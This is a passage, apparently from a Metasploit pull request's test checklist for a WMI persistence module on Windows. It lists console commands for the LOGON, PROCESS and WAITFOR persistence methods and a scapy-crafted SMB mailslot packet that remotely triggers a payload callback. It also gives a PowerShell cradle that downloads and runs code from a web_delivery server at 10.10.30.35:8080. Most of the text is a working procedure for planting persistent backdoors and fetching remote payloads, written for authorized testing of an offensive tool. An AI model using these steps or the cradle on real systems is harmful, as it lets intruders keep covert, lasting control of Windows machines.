- [ ] `set PERSISTENCE_METHOD LOGON`
- [ ] `exploit`
- [ ] Reboot target and wait 4 mins for payload to callback.
- [ ] `sessions -i 1 -C "resource /root/.msf4/logs/wmi_persistence/10.10.30.38_20170623.0735/10.10.30.38_20170623.0735.rc"`
- [ ] On the target machine use WmiEventHelper.exe to verify the subscriptions are created and deleted
### PERSISTENCE_METHOD PROCESS

- [ ] `set SESSION 1`
- [ ] `set PERSISTENCE_METHOD PROCESS`
- [ ] `exploit`
- [ ] Run calc.exe on the target (note: on windows 10 `set PRROCESS_TRIGGER notepad.exe` as calc.exe doesn't exist).
- [ ] Wait for payload to callback
- [ ] `sessions -i 1 -C "resource /root/.msf4/logs/wmi_persistence/10.10.30.38_20170623.0735/10.10.30.38_20170623.0735.rc"`
- [ ] On the target machine use WmiEventHelper.exe to verify the subscriptions are created and deleted

### PERSISTENCE_METHOD WAITFOR

- [ ] Verify target has filesharing enabled (and port 445 open)
- [ ] `set SESSION 1`
- [ ] `set PERSISTENCE_METHOD WAITFOR`
- [ ] `exploit`
- [ ] From a windows host run `waitfor.exe /S <target_ip> /SI CALL` from another host on the LAN or `waitfor.exe /SI CALL` on the target (note: this command may need to be run twice)
- [ ] Or from linux run `scapy`
`e = Ether(src='00:15:5d:01:bd:83', dst='ff:ff:ff:ff:ff:ff', type=2048)/IP(frag=0L, src='10.10.30.38', proto=17, tos=0, dst='10.10.30.255', ttl=128, len=212, options=[], version=4L, flags=0L, ihl=5L, chksum=57446, id=2170)/UDP(dport=138, sport=138, len=192, chksum=29924)/NBTDatagram(SourceName='WIN72', Type=17, SUFFIX2=16705, DestinationName='LAB', Length=170, Flags=2, Offset=0, SourcePort=138, NULL=0, SourceIP='10.10.30.38', ID=48543, SUFFIX1=16705)/Raw(load='\xffSMB%\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x11\x00\x00\x06\x00\x02\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x06\x00`\x00\x03\x00\x01\x00\x00\x00\x02\x00!\x00\\MAILSLOT\\WAITFOR.EXE\\call\x00W\x00I\x00N\x00')`
modify IP.src and IP.dst to match your environment
`sendp(e)`
- [ ] Wait for payload to callback
- [ ] `sessions -i 1 -C "resource /root/.msf4/logs/wmi_persistence/10.10.30.38_20170623.0735/10.10.30.38_20170623.0735.rc"`
- [ ] On the target machine use WmiEventHelper.exe to verify the subscriptions are created and deleted

### CUSTOM_PS_COMMAND

- Setup `exploit/multi/script/web_delivery`
- Using the same steps in PERSISTENCE_METHOD USERNAME except:
- [ ]  `set CUSTOM_PS_COMMAND "$j=new-object net.webclient;$j.proxy=[Net.WebRequest]::GetSystemWebProxy();$j.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $j.downloadstring('http://10.10.30.35:8080/');"` (note: include quotes)

Tested on win 7, 8.1, 10